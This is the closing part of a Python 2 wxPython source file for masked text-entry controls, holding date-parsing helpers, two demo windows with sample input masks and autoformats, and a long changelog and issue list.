if re.match(filter,fmtstring): return True
return False
def _isTimeType( fmtstring ):
""" Checks the mask and returns True if it fits an allowed
time format.
"""
reTimeMask = "^##:##(:##)?( (AM|PM))?"
filter = re.compile( reTimeMask )
if re.match(filter,fmtstring): return True
return False
def _isFloatingPoint( fmtstring):
filter = re.compile("[ ]?[#]+\.[#]+\n")
if re.match(filter,fmtstring+"\n"): return True
return False
def _isInteger( fmtstring ):
filter = re.compile("[#]+\n")
if re.match(filter,fmtstring+"\n"): return True
return False
def _getDateParts( dateStr, dateFmt ):
if len(dateStr) > 11: clip = dateStr[0:11]
else: clip = dateStr
if clip[-2] not in string.digits:
clip = clip[:-1] # (got part of time; drop it)
dateSep = (('/' in clip) * '/') + (('-' in clip) * '-') + (('.' in clip) * '.')
slices = clip.split(dateSep)
if dateFmt == "MDY":
y,m,d = (slices[2],slices[0],slices[1]) ## year, month, date parts
elif dateFmt == "DMY":
y,m,d = (slices[2],slices[1],slices[0]) ## year, month, date parts
elif dateFmt == "YMD":
y,m,d = (slices[0],slices[1],slices[2]) ## year, month, date parts
else:
y,m,d = None, None, None
if not y:
return None
else:
return y,m,d
def _getDateSepChar(dateStr):
clip = dateStr[0:10]
dateSep = (('/' in clip) * '/') + (('-' in clip) * '-') + (('.' in clip) * '.')
return dateSep
def _makeDate(year, month, day, dateFmt, dateStr):
    """
    Reassemble *year*, *month*, *day* into a date string laid out per
    *dateFmt* ("MDY", "DMY" or "YMD"), reusing the separator character
    detected in *dateStr*.  Returns None for an unrecognized format.
    """
    sep = _getDateSepChar(dateStr)
    if dateFmt == "MDY":
        return "%s%s%s%s%s" % (month, sep, day, sep, year)    ## year, month, date parts
    elif dateFmt == "DMY":
        return "%s%s%s%s%s" % (day, sep, month, sep, year)    ## year, month, date parts
    elif dateFmt == "YMD":
        return "%s%s%s%s%s" % (year, sep, month, sep, day)    ## year, month, date parts
    else:
        # BUG FIX: was `return none` (lowercase), which raised NameError
        # for any unrecognized format instead of returning None.
        return None
def _getYear(dateStr, dateFmt):
    """Return the year component of *dateStr* as parsed by _getDateParts."""
    return _getDateParts(dateStr, dateFmt)[0]
def _getMonth(dateStr, dateFmt):
    """Return the month component of *dateStr* as parsed by _getDateParts."""
    return _getDateParts(dateStr, dateFmt)[1]
def _getDay(dateStr, dateFmt):
    """Return the day component of *dateStr* as parsed by _getDateParts."""
    return _getDateParts(dateStr, dateFmt)[2]
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class __test(wx.PySimpleApp):
def OnInit(self):
from wx.lib.rcsizer import RowColSizer
self.frame = wx.Frame( None, -1, "MaskedEditMixin 0.0.7 Demo Page #1", size = (700,600))
self.panel = wx.Panel( self.frame, -1)
self.sizer = RowColSizer()
self.labels = []
self.editList = []
rowcount = 4
id, id1 = wx.NewId(), wx.NewId()
self.command1 = wx.Button( self.panel, id, "&Close" )
self.command2 = wx.Button( self.panel, id1, "&AutoFormats" )
self.sizer.Add(self.command1, row=0, col=0, flag=wx.ALL, border = 5)
self.sizer.Add(self.command2, row=0, col=1, colspan=2, flag=wx.ALL, border = 5)
self.panel.Bind(wx.EVT_BUTTON, self.onClick, self.command1 )
## self.panel.SetDefaultItem(self.command1 )
self.panel.Bind(wx.EVT_BUTTON, self.onClickPage, self.command2)
self.check1 = wx.CheckBox( self.panel, -1, "Disallow Empty" )
self.check2 = wx.CheckBox( self.panel, -1, "Highlight Empty" )
self.sizer.Add( self.check1, row=0,col=3, flag=wx.ALL,border=5 )
self.sizer.Add( self.check2, row=0,col=4, flag=wx.ALL,border=5 )
self.panel.Bind(wx.EVT_CHECKBOX, self._onCheck1, self.check1 )
self.panel.Bind(wx.EVT_CHECKBOX, self._onCheck2, self.check2 )
label = """Press ctrl-s in any field to output the value and plain value. Press ctrl-x to clear and re-set any field.
Note that all controls have been auto-sized by including F in the format code.
Try entering nonsensical or partial values in validated fields to see what happens (use ctrl-s to test the valid status)."""
label2 = "\nNote that the State and Last Name fields are list-limited (Name:Smith,Jones,Williams)."
self.label1 = wx.StaticText( self.panel, -1, label)
self.label2 = wx.StaticText( self.panel, -1, "Description")
self.label3 = wx.StaticText( self.panel, -1, "Mask Value")
self.label4 = wx.StaticText( self.panel, -1, "Format")
self.label5 = wx.StaticText( self.panel, -1, "Reg Expr Val. (opt)")
self.label6 = wx.StaticText( self.panel, -1, "MaskedEdit Ctrl")
self.label7 = wx.StaticText( self.panel, -1, label2)
self.label7.SetForegroundColour("Blue")
self.label1.SetForegroundColour("Blue")
self.label2.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label3.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label4.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label5.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label6.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.sizer.Add( self.label1, row=1,col=0,colspan=7, flag=wx.ALL,border=5)
self.sizer.Add( self.label7, row=2,col=0,colspan=7, flag=wx.ALL,border=5)
self.sizer.Add( self.label2, row=3,col=0, flag=wx.ALL,border=5)
self.sizer.Add( self.label3, row=3,col=1, flag=wx.ALL,border=5)
self.sizer.Add( self.label4, row=3,col=2, flag=wx.ALL,border=5)
self.sizer.Add( self.label5, row=3,col=3, flag=wx.ALL,border=5)
self.sizer.Add( self.label6, row=3,col=4, flag=wx.ALL,border=5)
# The following list is of the controls for the demo. Feel free to play around with
# the options!
controls = [
#description mask excl format regexp range,list,initial
("Phone No", "(###) ###-#### x:###", "", 'F!^-R', "^\(\d\d\d\) \d\d\d-\d\d\d\d", (),[],''),
("Last Name Only", "C{14}", "", 'F {list}', '^[A-Z][a-zA-Z]+', (),('Smith','Jones','Williams'),''),
("Full Name", "C{14}", "", 'F_', '^[A-Z][a-zA-Z]+ [A-Z][a-zA-Z]+', (),[],''),
("Social Sec#", "###-##-####", "", 'F', "\d{3}-\d{2}-\d{4}", (),[],''),
("U.S. Zip+4", "#{5}-#{4}", "", 'F', "\d{5}-(\s{4}|\d{4})",(),[],''),
("U.S. State (2 char)\n(with default)","AA", "", 'F!', "[A-Z]{2}", (),states, 'AZ'),
("Customer No", "\CAA-###", "", 'F!', "C[A-Z]{2}-\d{3}", (),[],''),
("Date (MDY) + Time\n(with default)", "##/##/#### ##:## AM", 'BCDEFGHIJKLMNOQRSTUVWXYZ','DFR!',"", (),[], r'03/05/2003 12:00 AM'),
("Invoice Total", "#{9}.##", "", 'F-R,', "", (),[], ''),
("Integer (signed)\n(with default)", "#{6}", "", 'F-R', "", (),[], '0 '),
("Integer (unsigned)\n(with default), 1-399", "######", "", 'F', "", (1,399),[], '1 '),
("Month selector", "XXX", "", 'F', "", (),
['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'],""),
("fraction selector","#/##", "", 'F', "^\d\/\d\d?", (),
['2/3', '3/4', '1/2', '1/4', '1/8', '1/16', '1/32', '1/64'], "")
]
for control in controls:
self.sizer.Add( wx.StaticText( self.panel, -1, control[0]),row=rowcount, col=0,border=5,flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[1]),row=rowcount, col=1,border=5, flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[3]),row=rowcount, col=2,border=5, flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[4][:20]),row=rowcount, col=3,border=5, flag=wx.ALL)
if control in controls[:]:#-2]:
newControl = MaskedTextCtrl( self.panel, -1, "",
mask = control[1],
excludeChars = control[2],
formatcodes = control[3],
includeChars = "",
validRegex = control[4],
validRange = control[5],
choices = control[6],
defaultValue = control[7],
demo = True)
if control[6]: newControl.SetCtrlParameters(choiceRequired = True)
else:
newControl = MaskedComboBox( self.panel, -1, "",
choices = control[7],
choiceRequired = True,
mask = control[1],
formatcodes = control[3],
excludeChars = control[2],
includeChars = "",
validRegex = control[4],
validRange = control[5],
demo = True)
self.editList.append( newControl )
self.sizer.Add( newControl, row=rowcount,col=4,flag=wx.ALL,border=5)
rowcount += 1
self.sizer.AddGrowableCol(4)
self.panel.SetSizer(self.sizer)
self.panel.SetAutoLayout(1)
self.frame.Show(1)
self.MainLoop()
return True
def onClick(self, event):
self.frame.Close()
def onClickPage(self, event):
self.page2 = __test2(self.frame,-1,"")
self.page2.Show(True)
def _onCheck1(self,event):
""" Set required value on/off """
value = event.IsChecked()
if value:
for control in self.editList:
control.SetCtrlParameters(emptyInvalid=True)
control.Refresh()
else:
for control in self.editList:
control.SetCtrlParameters(emptyInvalid=False)
control.Refresh()
self.panel.Refresh()
def _onCheck2(self,event):
""" Highlight empty values"""
value = event.IsChecked()
if value:
for control in self.editList:
control.SetCtrlParameters( emptyBackgroundColour = 'Aquamarine')
control.Refresh()
else:
for control in self.editList:
control.SetCtrlParameters( emptyBackgroundColour = 'White')
control.Refresh()
self.panel.Refresh()
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class __test2(wx.Frame):
    """Demo page #2 for the masked edit controls.

    Builds a RowColSizer grid with one row per sample: a description,
    the autoformat code used, and a live masked control constructed from
    that single ``autoformat`` parameter (the last row uses the derived
    IpAddrCtrl instead of MaskedTextCtrl).
    """
    def __init__(self, parent, id, caption):
        # NOTE(review): ``caption`` is accepted but never used below; the
        # frame title is hard-coded -- confirm before changing the signature.
        wx.Frame.__init__( self, parent, id, "MaskedEdit control 0.0.7 Demo Page #2 -- AutoFormats", size = (550,600))
        from wx.lib.rcsizer import RowColSizer
        self.panel = wx.Panel( self, -1)
        self.sizer = RowColSizer()
        self.labels = []
        self.texts = []
        # Grid rows 0-3 hold the buttons, banner and column headers; the
        # demo-control rows start at row 4.
        rowcount = 4
        label = """\
All these controls have been created by passing a single parameter, the AutoFormat code.
The class contains an internal dictionary of types and formats (autoformats).
To see a great example of validations in action, try entering a bad email address, then tab out."""
        # Banner and column-header labels.
        self.label1 = wx.StaticText( self.panel, -1, label)
        self.label2 = wx.StaticText( self.panel, -1, "Description")
        self.label3 = wx.StaticText( self.panel, -1, "AutoFormat Code")
        self.label4 = wx.StaticText( self.panel, -1, "MaskedEdit Control")
        self.label1.SetForegroundColour("Blue")
        self.label2.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
        self.label3.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
        self.label4.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
        self.sizer.Add( self.label1, row=1,col=0,colspan=3, flag=wx.ALL,border=5)
        self.sizer.Add( self.label2, row=3,col=0, flag=wx.ALL,border=5)
        self.sizer.Add( self.label3, row=3,col=1, flag=wx.ALL,border=5)
        self.sizer.Add( self.label4, row=3,col=2, flag=wx.ALL,border=5)
        id, id1 = wx.NewId(), wx.NewId()
        self.command1 = wx.Button( self.panel, id, "&Close")
        self.command2 = wx.Button( self.panel, id1, "&Print Formats")
        self.panel.Bind(wx.EVT_BUTTON, self.onClick, self.command1)
        self.panel.SetDefaultItem(self.command1)
        self.panel.Bind(wx.EVT_BUTTON, self.onClickPrint, self.command2)
        # The following list is of the controls for the demo. Feel free to play around with
        # the options!
        # Each entry is (description, autoformat code).
        controls = [
            ("Phone No","USPHONEFULLEXT"),
            ("US Date + Time","USDATETIMEMMDDYYYY/HHMM"),
            ("US Date MMDDYYYY","USDATEMMDDYYYY/"),
            ("Time (with seconds)","TIMEHHMMSS"),
            ("Military Time\n(without seconds)","24HRTIMEHHMM"),
            ("Social Sec#","USSOCIALSEC"),
            ("Credit Card","CREDITCARD"),
            ("Expiration MM/YY","EXPDATEMMYY"),
            ("Percentage","PERCENT"),
            ("Person's Age","AGE"),
            ("US Zip Code","USZIP"),
            ("US Zip+4","USZIPPLUS4"),
            ("Email Address","EMAIL"),
            ("IP Address", "(derived control IpAddrCtrl)")
            ]
        # One grid row per entry: description, code, then the live control.
        # All but the last entry are plain MaskedTextCtrls built purely from
        # the autoformat code; the final row demonstrates IpAddrCtrl.
        for control in controls:
            self.sizer.Add( wx.StaticText( self.panel, -1, control[0]),row=rowcount, col=0,border=5,flag=wx.ALL)
            self.sizer.Add( wx.StaticText( self.panel, -1, control[1]),row=rowcount, col=1,border=5, flag=wx.ALL)
            if control in controls[:-1]:
                self.sizer.Add( MaskedTextCtrl( self.panel, -1, "",
                                autoformat = control[1],
                                demo = True),
                        row=rowcount,col=2,flag=wx.ALL,border=5)
            else:
                self.sizer.Add( IpAddrCtrl( self.panel, -1, "", demo=True ),
                        row=rowcount,col=2,flag=wx.ALL,border=5)
            rowcount += 1
        self.sizer.Add(self.command1, row=0, col=0, flag=wx.ALL, border = 5)
        self.sizer.Add(self.command2, row=0, col=1, flag=wx.ALL, border = 5)
        self.sizer.AddGrowableCol(3)
        self.panel.SetSizer(self.sizer)
        self.panel.SetAutoLayout(1)
    def onClick(self, event):
        """Close-button handler: dismiss this page."""
        self.Close()
    def onClickPrint(self, event):
        """Print every known autoformat's mask and validation regex to stdout.

        NOTE(review): ``masktags`` is presumably the module-level autoformat
        dictionary defined earlier in this file (outside this excerpt).
        """
        for format in masktags.keys():
            sep = "+------------------------+"
            print "%s\n%s \n Mask: %s \n RE Validation string: %s\n" % (sep,format, masktags[format]['mask'], masktags[format]['validRegex'])
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
if __name__ == "__main__":
    # Launch the interactive demo application defined above.
    # NOTE(review): the False argument is presumably wx.App's ``redirect``
    # flag (keep stdout/stderr on the console) -- confirm against the base
    # class of ``__test``, whose definition is outside this excerpt.
    app = __test(False)
    # NOTE(review): ``__i`` looks like an unused leftover; verify nothing
    # else in the module reads it before removing.
    __i=0
##
## Current Issues:
## ===================================
##
## 1. WS: For some reason I don't understand, the control is generating two (2)
## EVT_TEXT events for every one (1) .SetValue() of the underlying control.
## I've been unsuccessful in determining why or in my efforts to make just one
## occur. So, I've added a hack to save the last seen value from the
## control in the EVT_TEXT handler, and if *different*, call event.Skip()
## to propagate it down the event chain, and let the application see it.
##
## 2. WS: MaskedComboBox is deficient in several areas, all having to do with the
## behavior of the underlying control that I can't fix. The problems are:
## a) The background coloring doesn't work in the text field of the control;
## instead, there's a only border around it that assumes the correct color.
## b) The control will not pass WXK_TAB to the event handler, no matter what
## I do, and there's no style wxCB_PROCESS_TAB like wxTE_PROCESS_TAB to
## indicate that we want these events. As a result, MaskedComboBox
## doesn't do the nice field-tabbing that MaskedTextCtrl does.
## c) Auto-complete had to be reimplemented for the control because programmatic
## setting of the value of the text field does not set up the auto complete
## the way that the control processing keystrokes does. (But I think I've
## implemented a fairly decent approximation.) Because of this the control
## also won't auto-complete on dropdown, and there's no event I can catch
## to work around this problem.
## d) There is no method provided for getting the selection; the hack I've
## implemented has its flaws, not the least of which is that due to the
## strategy that I'm using, the paste buffer is always replaced by the
## contents of the control's selection when in focus, on each keystroke;
## this makes it impossible to paste anything into a MaskedComboBox
## at the moment... :-(
## e) The other deficient behavior, likely induced by the workaround for (d),
##        is that you can't shift-left to select more than one character
## at a time.
##
##
## 3. WS: Controls on wxPanels don't seem to pass Shift-WXK_TAB to their
## EVT_KEY_DOWN or EVT_CHAR event handlers. Until this is fixed in
## wxWindows, shift-tab won't take you backwards through the fields of
## a MaskedTextCtrl like it should. Until then Shifted arrow keys will
## work like shift-tab and tab ought to.
##
## To-Do's:
## =============================##
## 1. Add Popup list for auto-completable fields that simulates combobox on individual
## fields. Example: City validates against list of cities, or zip vs zip code list.
## 2. Allow optional monetary symbols (eg. $, pounds, etc.) at front of a "decimal"
## control.
## 3. Fix shift-left selection for MaskedComboBox.
## 5. Transform notion of "decimal control" to be less "entire control"-centric,
## so that monetary symbols can be included and still have the appropriate
## semantics. (Big job, as currently written, but would make control even
## more useful for business applications.)
## CHANGELOG:
## ====================
## Version 1.13
## 1. Added parameter option stopFieldChangeIfInvalid, which can be used to relax the
## validation rules for a control, but make best efforts to stop navigation out of
## that field should its current value be invalid. Note: this does not prevent the
## value from remaining invalid if focus for the control is lost, via mousing etc.
##
## Version 1.12
## 1. Added proper support for NUMPAD keypad keycodes for navigation and control.
##
## Version 1.11
## 1. Added value member to ValueError exceptions, so that people can catch them
## and then display their own errors, and added attribute raiseOnInvalidPaste,
## so one doesn't have to subclass the controls simply to force generation of
## a ValueError on a bad paste operation.
## 2. Fixed handling of unicode charsets by converting to explicit control char
## set testing for passing those keystrokes to the base control, and then
## changing the semantics of the * maskchar to indicate any visible char.
## 3. Added '|' mask specification character, which allows splitting of contiguous
## mask characters into separate fields, allowing finer control of behavior
## of a control.
##
##
## Version 1.10
## 1. Added handling for WXK_DELETE and WXK_INSERT, such that shift-delete
## cuts, shift-insert pastes, and ctrl-insert copies.
##
## Version 1.9
## 1. Now ignores kill focus events when being destroyed.
## 2. Added missing call to set insertion point on changing fields.
## 3. Modified SetKeyHandler() to accept None as means of removing one.
## 4. Fixed keyhandler processing for group and decimal character changes.
## 5. Fixed a problem that prevented input into the integer digit of a
## integerwidth=1 numctrl, if the current value was 0.
## 6. Fixed logic involving processing of "_signOk" flag, to remove default
## sign key handlers if false, so that SetAllowNegative(False) in the
## NumCtrl works properly.
## 7. Fixed selection logic for numeric controls so that if selectOnFieldEntry
## is true, and the integer portion of an integer format control is selected
## and the sign position is selected, the sign keys will always result in a
## negative value, rather than toggling the previous sign.
##
##
## Version 1.8
## 1. Fixed bug involving incorrect variable name, causing combobox autocomplete to fail.
## 2. Added proper support for unicode version of wxPython
## 3. Added * as mask char meaning "all ansi chars" (ordinals 32-255).
## 4. Converted doc strings to use reST format, for ePyDoc documentation.
## 5. Renamed helper functions, classes, etc. not intended to be visible in public
## interface to code.
##
## Version 1.7
## 1. Fixed intra-right-insert-field erase, such that it doesn't leave a hole, but instead
## shifts the text to the left accordingly.
## 2. Fixed _SetValue() to place cursor after last character inserted, rather than end of
## mask.
## 3. Fixed some incorrect undo behavior for right-insert fields, and allowed derived classes
## (eg. numctrl) to pass modified values for undo processing (to handle/ignore grouping
## chars properly.)
## 4. Fixed autoselect behavior to work similarly to (2) above, so that combobox
## selection will only select the non-empty text, as per request.
## 5. Fixed tabbing to work with 2.5.2 semantics.
## 6. Fixed size calculation to handle changing fonts
##
## Version 1.6
## 1. Reorganized masked controls into separate package, renamed things accordingly
## 2. Split actual controls out of this file into their own files.
## Version 1.5
## (Reported) bugs fixed:
## 1. Crash ensues if you attempt to change the mask of a read-only
## MaskedComboBox after initial construction.
## 2. Changed strategy of defining Get/Set property functions so that
## these are now generated dynamically at runtime, rather than as
## part of the class definition. (This makes it possible to have
## more general base classes that have many more options for configuration
## without requiring that derivations support the same options.)
## 3. Fixed IsModified for _Paste() and _OnErase().
##
## Enhancements:
## 1. Fixed "attribute function inheritance," since base control is more
## generic than subsequent derivations, not all property functions of a
## generic control should be exposed in those derivations. New strategy
## uses base control classes (eg. BaseMaskedTextCtrl) that should be
## used to derive new class types, and mixed with their own mixins to
## only expose those attributes from the generic masked controls that
## make sense for the derivation. (This makes Boa happier.)
## 2. Renamed (with b-c) MILTIME autoformats to 24HRTIME, so as to be less
## "parochial."
##
## Version 1.4
## (Reported) bugs fixed:
## 1. Right-click menu allowed "cut" operation that destroyed mask
## (was implemented by base control)
## 2. MaskedComboBox didn't allow .Append() of mixed-case values; all
## got converted to lower case.
## 3. MaskedComboBox selection didn't deal with spaces in values
## properly when autocompleting, and didn't have a concept of "next"
## match for handling choice list duplicates.
## 4. Size of MaskedComboBox was always default.
## 5. Email address regexp allowed some "non-standard" things, and wasn't
## general enough.
## 6. Couldn't easily reset MaskedComboBox contents programmatically.
## 7. Couldn't set emptyInvalid during construction.
## 8. Under some versions of wxPython, readonly comboboxes can apparently
## return a GetInsertionPoint() result (655535), causing masked control
## to fail.
## 9. Specifying an empty mask caused the controls to traceback.
## 10. Can't specify float ranges for validRange.
## 11. '.' from within a the static portion of a restricted IP address
## destroyed the mask from that point rightward; tab when cursor is
## before 1st field takes cursor past that field.
##
## Enhancements:
## 12. Added Ctrl-Z/Undo handling, (and implemented context-menu properly.)
## 13. Added auto-select option on char input for masked controls with
## choice lists.
## 14. Added '>' formatcode, allowing insert within a given or each field
## as appropriate, rather than requiring "overwrite". This makes single
## field controls that just have validation rules (eg. EMAIL) much more
## friendly. The same flag controls left shift when deleting vs just
## blanking the value, and for right-insert fields, allows right-insert
## at any non-blank (non-sign) position in the field.
##  15. Added option to use parens to indicate negative values for numeric controls.
## 16. Improved OnFocus handling of numeric controls.
## 17. Enhanced Home/End processing to allow operation on a field level,
## using ctrl key.
## 18. Added individual Get/Set functions for control parameters, for
## simplified integration with Boa Constructor.
## 19. Standardized "Colour" parameter names to match wxPython, with
## non-british spellings still supported for backward-compatibility.
## 20. Added '&' mask specification character for punctuation only (no letters
## or digits).
## 21. Added (in a separate file) wx.MaskedCtrl() factory function to provide
## unified interface to the masked edit subclasses.
##
##
## Version 1.3
## 1. Made it possible to configure grouping, decimal and shift-decimal characters,
## to make controls more usable internationally.
## 2. Added code to smart "adjust" value strings presented to .SetValue()
## for right-aligned numeric format controls if they are shorter than
## than the control width, prepending the missing portion, prepending control
## template left substring for the missing characters, so that setting
## numeric values is easier.
## 3. Renamed SetMaskParameters SetCtrlParameters() (with old name preserved
## for b-c), as this makes more sense.
##
## Version 1.2
## 1. Fixed .SetValue() to replace the current value, rather than the current
## selection. Also changed it to generate ValueError if presented with
## either a value which doesn't follow the format or won't fit. Also made
## set value adjust numeric and date controls as if user entered the value.
## Expanded doc explaining how SetValue() works.
## 2. Fixed EUDATE* autoformats, fixed IsDateType mask list, and added ability to
## use 3-char months for dates, and EUDATETIME, and EUDATEMILTIME autoformats.
## 3. Made all date autoformats automatically pick implied "datestyle".
## 4. Added IsModified override, since base wx.TextCtrl never reports modified if
## .SetValue used to change the value, which is what the masked edit controls
## use internally.
## 5. Fixed bug in date position adjustment on 2 to 4 digit date conversion when
## using tab to "leave field" and auto-adjust.
## 6. Fixed bug in _isCharAllowed() for negative number insertion on pastes,
## and bug in ._Paste() that didn't account for signs in signed masks either.
## 7. Fixed issues with _adjustPos for right-insert fields causing improper
## selection/replacement of values
## 8. Fixed _OnHome handler to properly handle extending current selection to
## beginning of control.
## 9. Exposed all (valid) autoformats to demo, binding descriptions to
## autoformats.
## 10. Fixed a couple of bugs in email regexp.
## 11. Made maskchardict an instance var, to make mask chars to be more
## amenable to international use.
## 12. Clarified meaning of '-' formatcode in doc.
## 13. Fixed a couple of coding bugs being flagged by Python2.1.
## 14. Fixed several issues with sign positioning, erasure and validity
## checking for "numeric" masked controls.
## 15. Added validation to IpAddrCtrl.SetValue().
##
## Version 1.1
## 1. Changed calling interface to use boolean "useFixedWidthFont" (True by default)
## vs. literal font facename, and use wxTELETYPE as the font family
## if so specified.
## 2. Switched to use of dbg module vs. locally defined version.
## 3. Revamped entire control structure to use Field classes to hold constraint
## and formatting data, to make code more hierarchical, allow for more
## sophisticated masked edit construction.
## 4. Better strategy for managing options, and better validation on keywords.
## 5. Added 'V' format code, which requires that in order for a character
## to be accepted, it must result in a string that passes the validRegex.
## 6. Added 'S' format code which means "select entire field when navigating
## to new field."
## 7. Added 'r' format code to allow "right-insert" fields. (implies 'R'--right-alignment)
## 8. Added '<' format code to allow fields to require explicit cursor movement
## to leave field.
## 9. Added validFunc option to other validation mechanisms, that allows derived
## classes to add dynamic validation constraints to the control.
## 10. Fixed bug in validatePaste code causing possible IndexErrors, and also
## fixed failure to obey case conversion codes when pasting.
## 11. Implemented '0' (zero-pad) formatting code, as it wasn't being done anywhere...
## 12. Removed condition from OnDecimalPoint, so that it always truncates right on '.'
## 13. Enhanced IpAddrCtrl to use right-insert fields, selection on field traversal,
## individual field validation to prevent field values > 255, and require explicit
## tab/. to change fields.
## 14. Added handler for left double-click to select field under cursor.
## 15. Fixed handling for "Read-only" styles.
## 16. Separated signedForegroundColor from 'R' style, and added foregroundColor
## attribute, for more consistent and controllable coloring.
## 17. Added retainFieldValidation parameter, allowing top-level constraints
## such as "validRequired" to be set independently of field-level equivalent.
## (needed in TimeCtrl for bounds constraints.)
## 18. Refactored code a bit, cleaned up and commented code more heavily, fixed
## some of the logic for setting/resetting parameters, eg. fillChar, defaultValue,
## etc.
## 19. Fixed maskchar setting for upper/lowercase, to work in all locales.
##
##
## Version 1.0
## 1. Decimal point behavior restored for decimal and integer type controls:
##      decimal point now truncates the portion > 0.
## 2. Return key now works like the tab character and moves to the next field,
## provided no default button is set for the form panel on which the control
## resides.
## 3. Support added in _FindField() for subclasses controls (like timecontrol)
## to determine where the current insertion point is within the mask (i.e.
## which sub-'field'). See method documentation for more info and examples.
## 4. Added Field class and support for all constraints to be field-specific
## in addition to being globally settable for the control.
## Choices for each field are validated for length and pastability into
## the field in question, raising ValueError if not appropriate for the control.
## Also added selective additional validation based on individual field constraints.
## By default, SHIFT-WXK_DOWN, SHIFT-WXK_UP, WXK_PRIOR and WXK_NEXT all
## auto-complete fields with choice lists, supplying the 1st entry in
## the choice list if the field is empty, and cycling through the list in
## the appropriate direction if already a match. WXK_DOWN will also auto-
## complete if the field is partially completed and a match can be made.
## SHIFT-WXK_UP/DOWN will also take you to the next field after any
## auto-completion performed.
## 5. Added autoCompleteKeycodes=[] parameters for allowing further
## customization of the control. Any keycode supplied as a member
## of the _autoCompleteKeycodes list will be treated like WXK_NEXT. If
## requireFieldChoice is set, then a valid value from each non-empty
## choice list will be required for the value of the control to validate.
## 6. Fixed "auto-sizing" to be relative to the font actually used, rather
## than making assumptions about character width.
## 7. Fixed GetMaskParameter(), which was non-functional in previous version.
## 8. Fixed exceptions raised to provide info on which control had the error.
## 9. Fixed bug in choice management of MaskedComboBox.
## 10. Fixed bug in IpAddrCtrl causing traceback if field value was of
## the form '# #'. Modified control code for IpAddrCtrl so that '.'
## in the middle of a field clips the rest of that field, similar to
## decimal and integer controls.
##
##
## Version 0.0.7
## 1. "-" is a toggle for sign; "+" now changes - signed numerics to positive.
## 2. ',' in formatcodes now causes numeric values to be comma-delimited (e.g.333,333).
## 3. New support for selecting text within the control.(thanks Will Sadkin!)
## Shift-End and Shift-Home now select text as you would expect
## Control-Shift-End selects to the end of the mask string, even if value not entered.
## Control-A selects all *entered* text, Shift-Control-A selects everything in the control.
## 4. event.Skip() added to onKillFocus to correct remnants when running in Linux (contributed-
## for some reason I couldn't find the original email but thanks!!!)
## 5. All major key-handling code moved to their own methods for easier subclassing: OnHome,
## OnErase, OnEnd, OnCtrl_X, OnCtrl_A, etc.
## 6. Email and autoformat validations corrected using regex provided by Will Sadkin (thanks!).
## (The rest of the changes in this version were done by Will Sadkin with permission from Jeff...)
## 7. New mechanism for replacing default behavior for any given key, using
## ._SetKeycodeHandler(keycode, func) and ._SetKeyHandler(char, func) now available
## for easier subclassing of the control.
## 8. Reworked the delete logic, cut, paste and select/replace logic, as well as some bugs
## with insertion point/selection modification. Changed Ctrl-X to use standard "cut"
## semantics, erasing the selection, rather than erasing the entire control.
## 9. Added option for an "default value" (ie. the template) for use when a single fillChar
## is not desired in every position. Added IsDefault() function to mean "does the value
## equal the template?" and modified .IsEmpty() to mean "do all of the editable
## positions in the template == the fillChar?"
## 10. Extracted mask logic into mixin, so we can have both MaskedTextCtrl and MaskedComboBox,
## now included.
## 11. MaskedComboBox now adds the capability to validate from list of valid values.
## Example: City validates against list of cities, or zip vs zip code list.
## 12. Fixed oversight in EVT_TEXT handler that prevented the events from being
## passed to the next handler in the event chain, causing updates to the
## control to be invisible to the parent code.
## 13. Added IPADDR autoformat code, and subclass IpAddrCtrl for controlling tabbing within
## the control, that auto-reformats as you move between cells.
## 14. Mask characters [A,a,X,#] can now appear in the format string as literals, by using '\'.
## 15. It is now possible to specify repeating masks, e.g. #{3}-#{3}-#{14}
## 16. Fixed major bugs in date validation, due to the fact that
## wxDateTime.ParseDate is too liberal, and will accept any form that
## makes any kind of sense, regardless of the datestyle you specified
## for the control. Unfortunately, the strategy used to fix it only
## works for versions of wxPython post 2.3.3.1, as a C++ assert box
## seems to show up on an invalid date otherwise, instead of a catchable
## exception.
## 17. Enhanced date adjustment to automatically adjust heuristic based on
## current year, making last century/this century determination on
## 2-digit year based on distance between today's year and value;
## if > 50 year separation, assume last century (and don't assume last
## century is 20th.)
## 18. Added autoformats and support for including HHMMSS as well as HHMM for
##      date times, and added similar time, and military time autoformats.
## 19. Enhanced tabbing logic so that tab takes you to the next field if the
## control is a multi-field control.
## 20. Added stub method called whenever the control "changes fields", that
## can be overridden by subclasses (eg. IpAddrCtrl.)
## 21. Changed a lot of code to be more functionally-oriented so side-effects
## aren't as problematic when maintaining code and/or adding features.
## Eg: IsValid() now does not have side-effects; it merely reflects the
## validity of the value of the control; to determine validity AND recolor
## the control, _CheckValid() should be used with a value argument of None.
## Similarly, made most reformatting function take an optional candidate value
## rather than just using the current value of the control, and only
## have them change the value of the control if a candidate is not specified.
## In this way, you can do validation *before* changing the control.
## 22. Changed validRequired to mean "disallow chars that result in invalid
## value." (Old meaning now represented by emptyInvalid.) (This was
## possible once I'd made the changes in (19) above.)
## 23. Added .SetMaskParameters and .GetMaskParameter methods, so they
## can be set/modified/retrieved after construction. Removed individual
## parameter setting functions, in favor of this mechanism, so that
## all adjustment of the control based on changing parameter values can
## be handled in one place with unified mechanism.
## 24. Did a *lot* of testing and fixing re: numeric values. Added ability
## to type "grouping char" (ie. ',') and validate as appropriate.
## 25. Fixed ZIPPLUS4 to allow either 5 or 4, but if > 5 must be 9.
## 26. Fixed assumption about "decimal or integer" masks so that they're only
## made iff there's no validRegex associated with the field. (This
## is so things like zipcodes which look like integers can have more
## restrictive validation (ie. must be 5 digits.)
